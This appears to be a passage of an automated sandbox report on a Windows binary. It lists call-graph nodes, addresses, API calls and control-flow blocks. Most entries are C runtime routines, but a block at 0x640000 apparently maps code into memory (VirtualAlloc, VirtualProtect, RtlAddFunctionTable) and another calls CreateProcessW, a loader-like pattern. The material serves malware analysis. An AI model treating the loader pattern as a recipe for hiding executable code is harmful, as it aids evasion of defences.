7ff8ca9b7194 9956->9957 9959 7ff8ca9b6f0c _FF_MSGBANNER 45 API calls 9957->9959 9958->9948 9959->9958 9961 7ff8ca9b6f2f 9960->9961 9962 7ff8ca9bd2ac _FF_MSGBANNER 42 API calls 9961->9962 9992 7ff8ca9b70d4 9961->9992 9963 7ff8ca9b6f51 9962->9963 9964 7ff8ca9b70d6 GetStdHandle 9963->9964 9965 7ff8ca9bd2ac _FF_MSGBANNER 42 API calls 9963->9965 9966 
7ff8ca9b70e9 __tzset 9964->9966 9964->9992 9967 7ff8ca9b6f64 9965->9967 9969 7ff8ca9b70ff WriteFile 9966->9969 9966->9992 9967->9964 9968 7ff8ca9b6f75 9967->9968 9968->9992 10018 7ff8ca9b7fbc 9968->10018 9969->9992 9972 7ff8ca9b6fb9 GetModuleFileNameA 9973 7ff8ca9b6fd9 9972->9973 9978 7ff8ca9b700a __tzset 9972->9978 9975 7ff8ca9b7fbc __tzset 42 API calls 9973->9975 9974 7ff8ca9b6550 __tzset 6 API calls 9974->9972 9976 7ff8ca9b6ff1 9975->9976 9976->9978 9980 7ff8ca9b6550 __tzset 6 API calls 9976->9980 9977 7ff8ca9b7065 10036 7ff8ca9bbdf4 9977->10036 9978->9977 10027 7ff8ca9bbf14 9978->10027 9980->9978 9982 7ff8ca9b7090 9985 7ff8ca9bbdf4 _FF_MSGBANNER 42 API calls 9982->9985 9984 7ff8ca9b6550 __tzset 6 API calls 9984->9982 9987 7ff8ca9b70a6 9985->9987 9988 7ff8ca9b70bf 9987->9988 9990 7ff8ca9b6550 __tzset 6 API calls 9987->9990 10045 7ff8ca9bd0b8 9988->10045 9989 7ff8ca9b6550 __tzset 6 API calls 9989->9977 9990->9988 9992->9948 10063 7ff8ca9b3310 GetModuleHandleW 9993->10063 10066 7ff8ca9b2d70 GetLastError FlsGetValue 9996->10066 9998 7ff8ca9b67e9 9998->9947 10000 7ff8ca9bd2b4 9999->10000 10001 7ff8ca9b67e0 _errno 45 API calls 10000->10001 10004 7ff8ca9b716e 10000->10004 10002 7ff8ca9bd2d9 10001->10002 10005 7ff8ca9b66d8 DecodePointer 10002->10005 10004->9954 10004->9955 10006 7ff8ca9b6723 _invalid_parameter_noinfo 10005->10006 10007 7ff8ca9b6709 10005->10007 10009 7ff8ca9b6550 10006->10009 10007->10004 10016 7ff8ca9b87a0 10009->10016 10011 7ff8ca9b6570 RtlCaptureContext 10013 7ff8ca9b65ad 10011->10013 10012 7ff8ca9b660d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10014 7ff8ca9b6658 GetCurrentProcess TerminateProcess 10012->10014 10015 7ff8ca9b664c _invalid_parameter_noinfo 10012->10015 10013->10012 10014->10007 10015->10014 10017 7ff8ca9b87a9 10016->10017 10017->10011 10017->10017 10019 7ff8ca9b7fc7 10018->10019 10020 7ff8ca9b7fd1 10018->10020 10019->10020 10025 7ff8ca9b7ffd 10019->10025 10021 7ff8ca9b67e0 _errno 45 API calls 10020->10021 
10022 7ff8ca9b7fd9 10021->10022 10023 7ff8ca9b66d8 _invalid_parameter_noinfo 7 API calls 10022->10023 10024 7ff8ca9b6fa0 10023->10024 10024->9972 10024->9974 10025->10024 10026 7ff8ca9b67e0 _errno 45 API calls 10025->10026 10026->10022 10031 7ff8ca9bbf22 10027->10031 10028 7ff8ca9bbf27 10029 7ff8ca9b704c 10028->10029 10030 7ff8ca9b67e0 _errno 45 API calls 10028->10030 10029->9977 10029->9989 10032 7ff8ca9bbf51 10030->10032 10031->10028 10031->10029 10034 7ff8ca9bbf75 10031->10034 10033 7ff8ca9b66d8 _invalid_parameter_noinfo 7 API calls 10032->10033 10033->10029 10034->10029 10035 7ff8ca9b67e0 _errno 45 API calls 10034->10035 10035->10032 10037 7ff8ca9bbe0c 10036->10037 10039 7ff8ca9bbe02 10036->10039 10038 7ff8ca9b67e0 _errno 45 API calls 10037->10038 10044 7ff8ca9bbe14 10038->10044 10039->10037 10041 7ff8ca9bbe50 10039->10041 10040 7ff8ca9b66d8 _invalid_parameter_noinfo 7 API calls 10042 7ff8ca9b7077 10040->10042 10041->10042 10043 7ff8ca9b67e0 _errno 45 API calls 10041->10043 10042->9982 10042->9984 10043->10044 10044->10040 10062 7ff8ca9b2c5c EncodePointer 10045->10062 10064 7ff8ca9b333f ExitProcess 10063->10064 10065 7ff8ca9b332a GetProcAddress 10063->10065 10065->10064 10067 7ff8ca9b2d96 10066->10067 10068 7ff8ca9b2dde SetLastError 10066->10068 10069 7ff8ca9b3108 __wtomb_environ 40 API calls 10067->10069 10068->9998 10070 7ff8ca9b2da3 10069->10070 10070->10068 10071 7ff8ca9b2dab FlsSetValue 10070->10071 10072 7ff8ca9b2dc1 10071->10072 10073 7ff8ca9b2dd7 10071->10073 10074 7ff8ca9b2cbc _set_doserrno 40 API calls 10072->10074 10075 7ff8ca9b3024 free 40 API calls 10073->10075 10076 7ff8ca9b2dc8 GetCurrentThreadId 10074->10076 10077 7ff8ca9b2ddc 10075->10077 10076->10068 10077->10068 10079 7ff8ca9b4ed9 10078->10079 10080 7ff8ca9b4ee3 10078->10080 10082 7ff8ca9b4cd4 10079->10082 10080->9860 10106 7ff8ca9b2df4 10082->10106 10089 7ff8ca9b4e81 10089->10080 10090 7ff8ca9b309c __setargv 45 API calls 10091 7ff8ca9b4d24 __initmbctable 10090->10091 10091->10089 10129 
7ff8ca9b4a0c 10091->10129 10094 7ff8ca9b4e83 10094->10089 10096 7ff8ca9b4e9c 10094->10096 10097 7ff8ca9b3024 free 45 API calls 10094->10097 10095 7ff8ca9b4d5f 10099 7ff8ca9b3024 free 45 API calls 10095->10099 10100 7ff8ca9b4d84 10095->10100 10098 7ff8ca9b67e0 _errno 45 API calls 10096->10098 10097->10096 10098->10089 10099->10100 10100->10089 10139 7ff8ca9b6ba0 10100->10139 10107 7ff8ca9b2d70 _set_doserrno 45 API calls 10106->10107 10108 7ff8ca9b2dff 10107->10108 10109 7ff8ca9b2e0f 10108->10109 10145 7ff8ca9b32e0 10108->10145 10111 7ff8ca9b48c0 10109->10111 10112 7ff8ca9b2df4 _getptd 45 API calls 10111->10112 10113 7ff8ca9b48cf 10112->10113 10114 7ff8ca9b48ea 10113->10114 10115 7ff8ca9b6ba0 _lock 45 API calls 10113->10115 10116 7ff8ca9b496e 10114->10116 10120 7ff8ca9b32e0 _getptd 45 API calls 10114->10120 10118 7ff8ca9b48fd 10115->10118 10122 7ff8ca9b497c 10116->10122 10117 7ff8ca9b4934 10150 7ff8ca9b6a80 LeaveCriticalSection 10117->10150 10118->10117 10121 7ff8ca9b3024 free 45 API calls 10118->10121 10120->10116 10121->10117 10151 7ff8ca9b2534 10122->10151 10125 7ff8ca9b49c1 10127 7ff8ca9b49ac 10125->10127 10128 7ff8ca9b49c6 GetACP 10125->10128 10126 7ff8ca9b499c GetOEMCP 10126->10127 10127->10089 10127->10090 10128->10127 10130 7ff8ca9b497c __initmbctable 47 API calls 10129->10130 10131 7ff8ca9b4a33 10130->10131 10132 7ff8ca9b4a3b __initmbctable 10131->10132 10133 7ff8ca9b4a8c IsValidCodePage 10131->10133 10138 7ff8ca9b4ab2 unexpected 10131->10138 10328 7ff8ca9b20e0 10132->10328 10133->10132 10135 7ff8ca9b4a9d GetCPInfo 10133->10135 10135->10132 10135->10138 10136 7ff8ca9b4c6f 10136->10094 10136->10095 10318 7ff8ca9b46dc GetCPInfo 10138->10318 10140 7ff8ca9b6bbe 10139->10140 10141 7ff8ca9b6bcf EnterCriticalSection 10139->10141 10456 7ff8ca9b6ab8 10140->10456 10144 7ff8ca9b32e0 _getptd 44 API calls 10144->10141 10146 7ff8ca9b7160 _FF_MSGBANNER 44 API calls 10145->10146 10147 7ff8ca9b32ed 10146->10147 10148 7ff8ca9b6f0c _FF_MSGBANNER 44 API calls 10147->10148 10149 
7ff8ca9b32f4 DecodePointer 10148->10149 10152 7ff8ca9b254a 10151->10152 10158 7ff8ca9b25ae 10151->10158 10153 7ff8ca9b2df4 _getptd 45 API calls 10152->10153 10154 7ff8ca9b254f 10153->10154 10155 7ff8ca9b2587 10154->10155 10159 7ff8ca9b524c 10154->10159 10157 7ff8ca9b48c0 __initmbctable 45 API calls 10155->10157 10155->10158 10157->10158 10158->10125 10158->10126 10160 7ff8ca9b2df4 _getptd 45 API calls 10159->10160 10161 7ff8ca9b5257 10160->10161 10162 7ff8ca9b5280 10161->10162 10163 7ff8ca9b5272 10161->10163 10164 7ff8ca9b6ba0 _lock 45 API calls 10162->10164 10165 7ff8ca9b2df4 _getptd 45 API calls 10163->10165 10166 7ff8ca9b528a 10164->10166 10167 7ff8ca9b5277 10165->10167 10173 7ff8ca9b51f4 10166->10173 10171 7ff8ca9b52b8 10167->10171 10172 7ff8ca9b32e0 _getptd 45 API calls 10167->10172 10171->10155 10172->10171 10174 7ff8ca9b523e 10173->10174 10175 7ff8ca9b5202 ___lc_codepage_func 10173->10175 10177 7ff8ca9b6a80 LeaveCriticalSection 10174->10177 10175->10174 10178 7ff8ca9b4f04 10175->10178 10179 7ff8ca9b4f9b 10178->10179 10181 7ff8ca9b4f22 10178->10181 10180 7ff8ca9b4fee 10179->10180 10182 7ff8ca9b3024 free 45 API calls 10179->10182 10199 7ff8ca9b501b 10180->10199 10230 7ff8ca9b98a4 10180->10230 10181->10179 10184 7ff8ca9b4f61 10181->10184 10192 7ff8ca9b3024 free 45 API calls 10181->10192 10185 7ff8ca9b4fbf 10182->10185 10188 7ff8ca9b4f83 10184->10188 10198 7ff8ca9b3024 free 45 API calls 10184->10198 10187 7ff8ca9b3024 free 45 API calls 10185->10187 10193 7ff8ca9b4fd3 10187->10193 10190 7ff8ca9b3024 free 45 API calls 10188->10190 10189 7ff8ca9b5067 10194 7ff8ca9b4f8f 10190->10194 10191 7ff8ca9b3024 free 45 API calls 10191->10199 10195 7ff8ca9b4f55 10192->10195 10197 7ff8ca9b3024 free 45 API calls 10193->10197 10201 7ff8ca9b3024 free 45 API calls 10194->10201 10206 7ff8ca9b9df8 10195->10206 10196 7ff8ca9b3024 45 API calls free 10196->10199 10203 7ff8ca9b4fe2 10197->10203 10200 7ff8ca9b4f77 10198->10200 10199->10189 10199->10196 10222 7ff8ca9b9b68 10200->10222 
10201->10179 10205 7ff8ca9b3024 free 45 API calls 10203->10205 10205->10180 10207 7ff8ca9b9e01 10206->10207 10208 7ff8ca9b9e87 10206->10208 10209 7ff8ca9b9e1b 10207->10209 10210 7ff8ca9b3024 free 45 API calls 10207->10210 10208->10184 10211 7ff8ca9b9e2d 10209->10211 10212 7ff8ca9b3024 free 45 API calls 10209->10212 10210->10209 10213 7ff8ca9b9e3f 10211->10213 10214 7ff8ca9b3024 free 45 API calls 10211->10214 10212->10211 10215 7ff8ca9b9e51 10213->10215 10216 7ff8ca9b3024 free 45 API calls 10213->10216 10214->10213 10217 7ff8ca9b9e63 10215->10217 10219 7ff8ca9b3024 free 45 API calls 10215->10219 10216->10215 10218 7ff8ca9b9e75 10217->10218 10220 7ff8ca9b3024 free 45 API calls 10217->10220 10218->10208 10221 7ff8ca9b3024 free 45 API calls 10218->10221 10219->10217 10220->10218 10221->10208 10223 7ff8ca9b9b6d 10222->10223 10228 7ff8ca9b9baa 10222->10228 10224 7ff8ca9b9b86 10223->10224 10225 7ff8ca9b3024 free 45 API calls 10223->10225 10226 7ff8ca9b9b98 10224->10226 10227 7ff8ca9b3024 free 45 API calls 10224->10227 10225->10224 10226->10228 10229 7ff8ca9b3024 free 45 API calls 10226->10229 10227->10226 10228->10188 10229->10228 10231 7ff8ca9b500f 10230->10231 10232 7ff8ca9b98ad 10230->10232 10231->10191 10233 7ff8ca9b3024 free 45 API calls 10232->10233 10234 7ff8ca9b98be 10233->10234 10235 7ff8ca9b3024 free 45 API calls 10234->10235 10236 7ff8ca9b98c7 10235->10236 10237 7ff8ca9b3024 free 45 API calls 10236->10237 10238 7ff8ca9b98d0 10237->10238 10239 7ff8ca9b3024 free 45 API calls 10238->10239 10240 7ff8ca9b98d9 10239->10240 10241 7ff8ca9b3024 free 45 API calls 10240->10241 10242 7ff8ca9b98e2 10241->10242 10243 7ff8ca9b3024 free 45 API calls 10242->10243 10244 7ff8ca9b98eb 10243->10244 10245 7ff8ca9b3024 free 45 API calls 10244->10245 10246 7ff8ca9b98f3 10245->10246 10247 7ff8ca9b3024 free 45 API calls 10246->10247 10248 7ff8ca9b98fc 10247->10248 10249 7ff8ca9b3024 free 45 API calls 10248->10249 10250 7ff8ca9b9905 10249->10250 10251 7ff8ca9b3024 free 45 API calls 
10250->10251 10252 7ff8ca9b990e 10251->10252 10253 7ff8ca9b3024 free 45 API calls 10252->10253 10254 7ff8ca9b9917 10253->10254 10255 7ff8ca9b3024 free 45 API calls 10254->10255 10256 7ff8ca9b9920 10255->10256 10257 7ff8ca9b3024 free 45 API calls 10256->10257 10258 7ff8ca9b9929 10257->10258 10259 7ff8ca9b3024 free 45 API calls 10258->10259 10260 7ff8ca9b9932 10259->10260 10261 7ff8ca9b3024 free 45 API calls 10260->10261 10262 7ff8ca9b993b 10261->10262 10263 7ff8ca9b3024 free 45 API calls 10262->10263 10264 7ff8ca9b9944 10263->10264 10265 7ff8ca9b3024 free 45 API calls 10264->10265 10266 7ff8ca9b9950 10265->10266 10267 7ff8ca9b3024 free 45 API calls 10266->10267 10268 7ff8ca9b995c 10267->10268 10269 7ff8ca9b3024 free 45 API calls 10268->10269 10270 7ff8ca9b9968 10269->10270 10271 7ff8ca9b3024 free 45 API calls 10270->10271 10272 7ff8ca9b9974 10271->10272 10273 7ff8ca9b3024 free 45 API calls 10272->10273 10274 7ff8ca9b9980 10273->10274 10275 7ff8ca9b3024 free 45 API calls 10274->10275 10276 7ff8ca9b998c 10275->10276 10277 7ff8ca9b3024 free 45 API calls 10276->10277 10278 7ff8ca9b9998 10277->10278 10279 7ff8ca9b3024 free 45 API calls 10278->10279 10280 7ff8ca9b99a4 10279->10280 10281 7ff8ca9b3024 free 45 API calls 10280->10281 10282 7ff8ca9b99b0 10281->10282 10283 7ff8ca9b3024 free 45 API calls 10282->10283 10284 7ff8ca9b99bc 10283->10284 10285 7ff8ca9b3024 free 45 API calls 10284->10285 10286 7ff8ca9b99c8 10285->10286 10287 7ff8ca9b3024 free 45 API calls 10286->10287 10288 7ff8ca9b99d4 10287->10288 10289 7ff8ca9b3024 free 45 API calls 10288->10289 10290 7ff8ca9b99e0 10289->10290 10291 7ff8ca9b3024 free 45 API calls 10290->10291 10292 7ff8ca9b99ec 10291->10292 10293 7ff8ca9b3024 free 45 API calls 10292->10293 10294 7ff8ca9b99f8 10293->10294 10295 7ff8ca9b3024 free 45 API calls 10294->10295 10296 7ff8ca9b9a04 10295->10296 10297 7ff8ca9b3024 free 45 API calls 10296->10297 10298 7ff8ca9b9a10 10297->10298 10299 7ff8ca9b3024 free 45 API calls 10298->10299 10300 7ff8ca9b9a1c 
10299->10300 10301 7ff8ca9b3024 free 45 API calls 10300->10301 10302 7ff8ca9b9a28 10301->10302 10303 7ff8ca9b3024 free 45 API calls 10302->10303 10304 7ff8ca9b9a34 10303->10304 10305 7ff8ca9b3024 free 45 API calls 10304->10305 10306 7ff8ca9b9a40 10305->10306 10307 7ff8ca9b3024 free 45 API calls 10306->10307 10308 7ff8ca9b9a4c 10307->10308 10309 7ff8ca9b3024 free 45 API calls 10308->10309 10310 7ff8ca9b9a58 10309->10310 10311 7ff8ca9b3024 free 45 API calls 10310->10311 10312 7ff8ca9b9a64 10311->10312 10313 7ff8ca9b3024 free 45 API calls 10312->10313 10314 7ff8ca9b9a70 10313->10314 10315 7ff8ca9b3024 free 45 API calls 10314->10315 10316 7ff8ca9b9a7c 10315->10316 10317 7ff8ca9b3024 free 45 API calls 10316->10317 10317->10231 10319 7ff8ca9b480a 10318->10319 10320 7ff8ca9b471e unexpected 10318->10320 10322 7ff8ca9b20e0 __initmbctable 8 API calls 10319->10322 10339 7ff8ca9b91a0 10320->10339 10324 7ff8ca9b48aa 10322->10324 10324->10132 10327 7ff8ca9b8e9c __initmbctable 78 API calls 10327->10319 10329 7ff8ca9b20e9 10328->10329 10330 7ff8ca9b20f4 10329->10330 10331 7ff8ca9b23e8 RtlCaptureContext RtlLookupFunctionEntry 10329->10331 10330->10136 10332 7ff8ca9b242c RtlVirtualUnwind 10331->10332 10333 7ff8ca9b246d 10331->10333 10334 7ff8ca9b248f IsDebuggerPresent 10332->10334 10333->10334 10455 7ff8ca9b460c 10334->10455 10336 7ff8ca9b24ee SetUnhandledExceptionFilter UnhandledExceptionFilter 10337 7ff8ca9b2516 GetCurrentProcess TerminateProcess 10336->10337 10338 7ff8ca9b250c _invalid_parameter_noinfo 10336->10338 10337->10136 10338->10337 10340 7ff8ca9b2534 _wcstoui64 45 API calls 10339->10340 10341 7ff8ca9b91c4 10340->10341 10349 7ff8ca9b8f34 10341->10349 10344 7ff8ca9b8e9c 10345 7ff8ca9b2534 _wcstoui64 45 API calls 10344->10345 10346 7ff8ca9b8ec0 10345->10346 10408 7ff8ca9b895c 10346->10408 10350 7ff8ca9b8f84 GetStringTypeW 10349->10350 10352 7ff8ca9b8fc1 10349->10352 10351 7ff8ca9b8fa6 GetLastError 10350->10351 10353 7ff8ca9b8f9e 10350->10353 10351->10352 10352->10353 10354 
7ff8ca9b90f0 10352->10354 10355 7ff8ca9b90e9 10353->10355 10356 7ff8ca9b8fea MultiByteToWideChar 10353->10356 10373 7ff8ca9be1e8 GetLocaleInfoA 10354->10373 10359 7ff8ca9b20e0 __initmbctable 8 API calls 10355->10359 10356->10355 10362 7ff8ca9b9018 10356->10362 10360 7ff8ca9b47a1 10359->10360 10360->10344 10361 7ff8ca9b914b GetStringTypeA 10361->10355 10364 7ff8ca9b916e 10361->10364 10365 7ff8ca9b6c34 realloc 45 API calls 10362->10365 10368 7ff8ca9b903d unexpected wcsftime 10362->10368 10369 7ff8ca9b3024 free 45 API calls 10364->10369 10365->10368 10366 7ff8ca9b90a4 MultiByteToWideChar 10370 7ff8ca9b90c6 GetStringTypeW 10366->10370 10371 7ff8ca9b90db 10366->10371 10368->10355 10368->10366 10369->10355 10370->10371 10371->10355 10372 7ff8ca9b3024 free 45 API calls 10371->10372 10372->10355 10374 7ff8ca9be21a 10373->10374 10375 7ff8ca9be21f 10373->10375 10377 7ff8ca9b20e0 __initmbctable 8 API calls 10374->10377 10404 7ff8ca9b2100 10375->10404 10378 7ff8ca9b911a 10377->10378 10378->10355 10378->10361 10379 7ff8ca9be23c 10378->10379 10380 7ff8ca9be366 10379->10380 10381 7ff8ca9be28e GetCPInfo 10379->10381 10384 7ff8ca9b20e0 __initmbctable 8 API calls 10380->10384 10382 7ff8ca9be2a0 10381->10382 10383 7ff8ca9be33f MultiByteToWideChar 10381->10383 10382->10383 10385 7ff8ca9be2aa GetCPInfo 10382->10385 10383->10380 10388 7ff8ca9be2c5 __tzset 10383->10388 10386 7ff8ca9b9140 10384->10386 10385->10383 10387 7ff8ca9be2bf 10385->10387 10386->10355 10386->10361 10387->10383 10387->10388 10389 7ff8ca9be301 unexpected wcsftime 10388->10389 10390 7ff8ca9b6c34 realloc 45 API calls 10388->10390 10389->10380 10391 7ff8ca9be39d MultiByteToWideChar 10389->10391 10390->10389 10392 7ff8ca9be3c7 10391->10392 10396 7ff8ca9be3ff 10391->10396 10393 7ff8ca9be407 10392->10393 10394 7ff8ca9be3cc WideCharToMultiByte 10392->10394 10397 7ff8ca9be439 10393->10397 10398 7ff8ca9be40d WideCharToMultiByte 10393->10398 10394->10396 10395 7ff8ca9b3024 free 45 API calls 10395->10380 10396->10380 
10396->10395 10399 7ff8ca9b3108 __wtomb_environ 45 API calls 10397->10399 10398->10396 10398->10397 10400 7ff8ca9be446 10399->10400 10400->10396 10401 7ff8ca9be44e WideCharToMultiByte 10400->10401 10401->10396 10402 7ff8ca9be477 10401->10402 10403 7ff8ca9b3024 free 45 API calls 10402->10403 10403->10396 10405 7ff8ca9b287c 10404->10405 10406 7ff8ca9b25f8 _wcstoui64 67 API calls 10405->10406 10407 7ff8ca9b28a7 10406->10407 10407->10374 10409 7ff8ca9b89b4 LCMapStringW 10408->10409 10412 7ff8ca9b89d8 10408->10412 10410 7ff8ca9b89e4 GetLastError 10409->10410 10409->10412 10410->10412 10411 7ff8ca9b8ca6 10416 7ff8ca9be1e8 _wcstoui64 67 API calls 10411->10416 10412->10411 10413 7ff8ca9b8a53 10412->10413 10414 7ff8ca9b8c9f 10413->10414 10415 7ff8ca9b8a71 MultiByteToWideChar 10413->10415 10417 7ff8ca9b20e0 __initmbctable 8 API calls 10414->10417 10415->10414 10425 7ff8ca9b8aa0 10415->10425 10418 7ff8ca9b8cd4 10416->10418 10419 7ff8ca9b47d4 10417->10419 10418->10414 10421 7ff8ca9b8cf3 10418->10421 10422 7ff8ca9b8e2f LCMapStringA 10418->10422 10419->10327 10420 7ff8ca9b8b1c MultiByteToWideChar 10423 7ff8ca9b8c91 10420->10423 10424 7ff8ca9b8b46 LCMapStringW 10420->10424 10426 7ff8ca9be23c _wcstoui64 60 API calls 10421->10426 10437 7ff8ca9b8d3b 10422->10437 10423->10414 10433 7ff8ca9b3024 free 45 API calls 10423->10433 10424->10423 10427 7ff8ca9b8b70 10424->10427 10428 7ff8ca9b8ad1 wcsftime 10425->10428 10429 7ff8ca9b6c34 realloc 45 API calls 10425->10429 10430 7ff8ca9b8d0b 10426->10430 10434 7ff8ca9b8b7b 10427->10434 10440 7ff8ca9b8bb6 10427->10440 10428->10414 10428->10420 10429->10428 10430->10414 10431 7ff8ca9b8d13 LCMapStringA 10430->10431 10431->10437 10442 7ff8ca9b8d42 10431->10442 10432 7ff8ca9b8e5f 10432->10414 10438 7ff8ca9b3024 free 45 API calls 10432->10438 10433->10414 10434->10423 10436 7ff8ca9b8b92 LCMapStringW 10434->10436 10435 7ff8ca9b3024 free 45 API calls 10435->10432 10436->10423 10437->10432 10437->10435 10438->10414 10439 7ff8ca9b8c23 LCMapStringW 10443 
7ff8ca9b8c83 10439->10443 10444 7ff8ca9b8c44 WideCharToMultiByte 10439->10444 10441 7ff8ca9b6c34 realloc 45 API calls 10440->10441 10448 7ff8ca9b8bd4 wcsftime 10440->10448 10441->10448 10446 7ff8ca9b8d63 unexpected wcsftime 10442->10446 10447 7ff8ca9b6c34 realloc 45 API calls 10442->10447 10443->10423 10452 7ff8ca9b3024 free 45 API calls 10443->10452 10444->10443 10445 7ff8ca9b8dc5 LCMapStringA 10449 7ff8ca9b8df1 10445->10449 10450 7ff8ca9b8ded 10445->10450 10446->10437 10446->10445 10447->10446 10448->10423 10448->10439 10453 7ff8ca9be23c _wcstoui64 60 API calls 10449->10453 10450->10437 10454 7ff8ca9b3024 free 45 API calls 10450->10454 10452->10423 10453->10450 10454->10437 10455->10336 10457 7ff8ca9b6af6 10456->10457 10458 7ff8ca9b6adf 10456->10458 10461 7ff8ca9b309c __setargv 44 API calls 10457->10461 10470 7ff8ca9b6b0b 10457->10470 10459 7ff8ca9b7160 _FF_MSGBANNER 44 API calls 10458->10459 10460 7ff8ca9b6ae4 10459->10460 10462 7ff8ca9b6f0c _FF_MSGBANNER 44 API calls 10460->10462 10463 7ff8ca9b6b19 10461->10463 10464 7ff8ca9b6aec 10462->10464 10465 7ff8ca9b6b30 10463->10465 10466 7ff8ca9b6b21 10463->10466 10467 7ff8ca9b334c realloc 3 API calls 10464->10467 10469 7ff8ca9b6ba0 _lock 44 API calls 10465->10469 10468 7ff8ca9b67e0 _errno 44 API calls 10466->10468 10467->10457 10468->10470 10471 7ff8ca9b6b3a 10469->10471 10470->10141 10470->10144 10472 7ff8ca9b6b72 10471->10472 10473 7ff8ca9b6b43 10471->10473 10475 7ff8ca9b3024 free 44 API calls 10472->10475 10474 7ff8ca9b7ee4 _lock InitializeCriticalSectionAndSpinCount 10473->10474 10476 7ff8ca9b6b50 10474->10476 10477 7ff8ca9b6b61 LeaveCriticalSection 10475->10477 10476->10477 10479 7ff8ca9b3024 free 44 API calls 10476->10479 10477->10470 10480 7ff8ca9b6b5c 10479->10480 10481 7ff8ca9b67e0 _errno 44 API calls 10480->10481 10481->10477 10483 7ff8ca9b740a EncodePointer 10482->10483 10483->10483 10484 7ff8ca9b741f 10483->10484 10484->9884 10488 7ff8ca9b72d4 10485->10488 10501 7ff8ca9b3364 10488->10501 10503 7ff8ca9b6d01 
10502->10503 10509 7ff8ca9b6d33 realloc 10502->10509 10504 7ff8ca9b6d0f 10503->10504 10503->10509 10505 7ff8ca9b67e0 _errno 44 API calls 10504->10505 10507 7ff8ca9b6d14 10505->10507 10506 7ff8ca9b6d4b RtlAllocateHeap 10508 7ff8ca9b6d2f 10506->10508 10506->10509 10510 7ff8ca9b66d8 _invalid_parameter_noinfo 7 API calls 10507->10510 10508->9888 10509->10506 10509->10508 10510->10508 10513 7ff8ca9b2e21 10512->10513 10514 7ff8ca9b2f42 10512->10514 10515 7ff8ca9b2e3c 10513->10515 10516 7ff8ca9b3024 free 45 API calls 10513->10516 10514->9916 10517 7ff8ca9b2e4a 10515->10517 10519 7ff8ca9b3024 free 45 API calls 10515->10519 10516->10515 10518 7ff8ca9b2e58 10517->10518 10520 7ff8ca9b3024 free 45 API calls 10517->10520 10521 7ff8ca9b2e66 10518->10521 10522 7ff8ca9b3024 free 45 API calls 10518->10522 10519->10517 10520->10518 10523 7ff8ca9b2e74 10521->10523 10524 7ff8ca9b3024 free 45 API calls 10521->10524 10522->10521 10525 7ff8ca9b2e82 10523->10525 10526 7ff8ca9b3024 free 45 API calls 10523->10526 10524->10523 10527 7ff8ca9b2e93 10525->10527 10528 7ff8ca9b3024 free 45 API calls 10525->10528 10526->10525 10529 7ff8ca9b2eab 10527->10529 10530 7ff8ca9b3024 free 45 API calls 10527->10530 10528->10527 10531 7ff8ca9b6ba0 _lock 45 API calls 10529->10531 10530->10529 10534 7ff8ca9b2eb5 10531->10534 10532 7ff8ca9b2ee3 10544 7ff8ca9b6a80 LeaveCriticalSection 10532->10544 10534->10532 10536 7ff8ca9b3024 free 45 API calls 10534->10536 10536->10532 10545 7ff8ca9b2050 10548 7ff8ca971000 10545->10548 10549 7ff8ca97101e ExitProcess 10548->10549 9720 640000 9721 640183 9720->9721 9722 64043e VirtualAlloc 9721->9722 9725 640462 9722->9725 9723 640531 GetNativeSystemInfo 9724 64056d VirtualAlloc 9723->9724 9727 640a7b 9723->9727 9726 64058b 9724->9726 9725->9723 9725->9727 9728 640a00 9726->9728 9730 6409d9 VirtualProtect 9726->9730 9728->9727 9729 640a56 RtlAddFunctionTable 9728->9729 9729->9727 9730->9726 9731 7ff8ca9b1ee7 9732 7ff8ca9b1f13 RtlAllocateHeap 9731->9732 9733 7ff8ca9b1f5c 
9732->9733 9734 7ff8ca9b1f3d RtlDeleteBoundaryDescriptor 9732->9734 9734->9733 10550 180021c3c 10551 180021c97 10550->10551 10554 180001bdc 10551->10554 10553 180021e38 10556 180001c82 10554->10556 10555 180001d21 CreateProcessW 10555->10553 10556->10555

                                                                    Control-flow Graph

                                                                    control_flow_graph 8 640000-640460 call 640aa8 * 2 VirtualAlloc 30 640462-640466 8->30 31 64048a-640494 8->31 32 640468-640488 30->32 34 640a91-640aa6 31->34 35 64049a-64049e 31->35 32->31 32->32 35->34 36 6404a4-6404a8 35->36 36->34 37 6404ae-6404b2 36->37 37->34 38 6404b8-6404bf 37->38 38->34 39 6404c5-6404d2 38->39 39->34 40 6404d8-6404e1 39->40 40->34 41 6404e7-6404f4 40->41 41->34 42 6404fa-640507 41->42 43 640531-640567 GetNativeSystemInfo 42->43 44 640509-640511 42->44 43->34 46 64056d-640589 VirtualAlloc 43->46 45 640513-640518 44->45 47 640521 45->47 48 64051a-64051f 45->48 49 6405a0-6405ac 46->49 50 64058b-64059e 46->50 51 640523-64052f 47->51 48->51 52 6405af-6405b2 49->52 50->49 51->43 51->45 54 6405b4-6405bf 52->54 55 6405c1-6405db 52->55 54->52 56 6405dd-6405e2 55->56 57 64061b-640622 55->57 58 6405e4-6405ea 56->58 59 640628-64062f 57->59 60 6406db-6406e2 57->60 61 6405ec-640609 58->61 62 64060b-640619 58->62 59->60 63 640635-640642 59->63 64 640864-64086b 60->64 65 6406e8-6406f9 60->65 61->61 61->62 62->57 62->58 63->60 68 640648-64064f 63->68 66 640917-640929 64->66 67 640871-64087f 64->67 69 640702-640705 65->69 70 640a07-640a1a 66->70 71 64092f-640937 66->71 72 64090e-640911 67->72 73 640654-640658 68->73 74 640707-64070a 69->74 75 6406fb-6406ff 69->75 98 640a40-640a4a 70->98 99 640a1c-640a27 70->99 77 64093b-64093f 71->77 72->66 76 640884-6408a9 72->76 78 6406c0-6406ca 73->78 79 64070c-64071d 74->79 80 640788-64078e 74->80 75->69 104 640907-64090c 76->104 105 6408ab-6408b1 76->105 84 640945-64095a 77->84 85 6409ec-6409fa 77->85 82 6406cc-6406d2 78->82 83 64065a-640669 78->83 81 640794-6407a2 79->81 86 64071f-640720 79->86 80->81 88 64085d-64085e 81->88 89 6407a8 81->89 82->73 90 6406d4-6406d5 82->90 94 64067a-64067e 83->94 95 64066b-640678 83->95 92 64095c-64095e 84->92 93 64097b-64097d 84->93 85->77 96 640a00-640a01 85->96 97 640722-640784 86->97 88->64 101 6407ae-6407d4 89->101 
